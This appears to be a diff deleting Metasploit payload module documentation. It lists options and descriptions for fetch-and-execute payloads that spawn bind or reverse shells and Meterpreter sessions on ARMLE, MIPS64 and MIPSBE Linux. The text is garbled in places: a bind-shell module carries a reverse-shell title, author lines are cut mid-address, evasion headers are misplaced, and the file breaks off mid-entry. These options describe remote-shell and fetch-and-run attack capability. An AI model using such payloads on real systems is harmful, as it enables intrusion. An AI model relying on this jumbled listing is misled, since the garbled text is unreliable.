EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,76 +0,0 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
Module: payload/cmd/linux/http/armle/shell_bind_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
civ
hal
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ARGV0 sh no argv[0] to pass to execve
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LPORT 4444 yes The listen port
RHOST no The target address
SHELL /bin/sh yes The shell to execute.
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME spYHQrQwU no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Connect to target and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,82 +0,0 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
Module: payload/cmd/linux/http/armle/shell_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 102
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
civ
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ARGV0 sh no argv[0] to pass to execve
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL /bin/sh yes The shell to execute.
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME EzSqYGrB no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,104 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mips64/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 102
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/mips64/meterpreter_reverse_http:
=========================
ok@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME jkofOBXy no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute a MIPS64 payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,106 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mips64/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
B
Evasion options for payload/cmd/linux/http/mips64/meterpreter_reverse_https:
=========================
@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME nqGcBdJTD no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute a MIPS64 payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,97 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mips64/meterpreter_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME qPigzETmWu no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute a MIPS64 payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,69 +0,0 @@
Name: HTTP Fetch, Linux Execute Command
Module: payload/cmd/linux/http/mipsbe/exec
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Michael Messner <devnull@s3cur1ty.de>
entropy <entropy@phiral.net>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes The command string to execute
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME liEefdOwA no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
A very small shellcode for executing commands.
This module is sometimes helpful for testing purposes.
Name Current Setting Required Description
---- --------------- -------- -----------
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,100 +0,0 @@
Name: HTTP Fetch, Reverse TCP Stager
Module: payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Norm
Evasion options for payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp:
=========================
juan vazquez <juan.vazquez@metasploit.com>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME EjqTwHWHT no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,104 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/mipsbe/meterpreter_reverse_http:
=========================
ok@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
